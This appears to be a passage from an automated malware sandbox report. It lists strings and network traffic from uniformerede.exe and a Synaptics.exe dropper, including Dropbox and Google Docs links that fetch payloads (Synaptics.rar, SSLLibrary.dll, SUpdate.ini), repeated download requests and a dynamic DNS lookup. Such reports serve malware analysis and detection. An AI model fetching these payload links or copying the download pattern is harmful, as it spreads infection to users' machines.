Source: uniformerede.exe, 00000006.00000003.286322922.0000000002210000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloX
Source: uniformerede.exe, 00000006.00000003.286322922.0000000002210000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloXO
Source: RCXDA77.tmp.9.dr	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
Source: Synaptics.exe, 00000009.00000000.350557009.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.357490239.00000000021E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloadN
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://edu-mathreco-prod.trafficmanager.net
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://edu-mathsolver-prod.trafficmanager.net
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://enrichment.osi.office.net/
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://graph.ppe.windows.net
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://graph.ppe.windows.net/
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://graph.windows.net
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://graph.windows.net/
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://incidents.diagnostics.office.com
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://inclient.store.office.com/gyro/client
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://inclient.store.office.com/gyro/clientstore
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://invites.office.com/
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://lifecycle.office.com
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://login.microsoftonline.com/
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://login.windows.local
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://management.azure.com
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://management.azure.com/
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://messaging.engagement.office.com/
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://messaging.office.com/
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://ncus.contentsync.
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://ncus.pagecontentsync.
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://officeapps.live.com
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://onedrive.live.com
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://onedrive.live.com/embed?
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://osi.office.net
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://otelrules.azureedge.net
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://outlook.office.com
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://outlook.office.com/
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://outlook.office365.com
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://outlook.office365.com/
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://pages.store.office.com/review/query
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://powerlift.acompli.net
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://roaming.edog.
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://settings.outlook.com
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://shell.suite.office.com:1443
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://skyapi.live.net/Activity/
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://staging.cortana.ai
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://store.office.cn/addinstemplate
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://store.office.de/addinstemplate
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://tasks.office.com
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://web.microsoftstream.com/video/
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://webshell.suite.office.com
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://wus2.contentsync.
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://wus2.pagecontentsync.
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: uniformerede.exe, 00000006.00000003.286322922.0000000002210000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=
Source: RCXDA77.tmp.9.dr	String found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
Source: Synaptics.exe, 00000009.00000000.350557009.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.357490239.00000000021E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:
Source: RCXDA77.tmp.9.dr	String found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
Source: Synaptics.exe, 00000009.00000000.350557009.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.357490239.00000000021E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16
Source: uniformerede.exe, 00000006.00000003.286322922.0000000002210000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dll
Source: RCXDA77.tmp.9.dr	String found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
Source: Synaptics.exe, 00000009.00000000.350557009.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.357490239.00000000021E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://www.odwebp.svc.ms

Source: unknown

DNS traffic detected: queries for: docs.google.com

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe

Code function: 6_2_00474D50 InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,

6_2_00474D50

Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1User-Agent: MyAppHost: freedns.afraid.orgCache-Control: no-cache

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
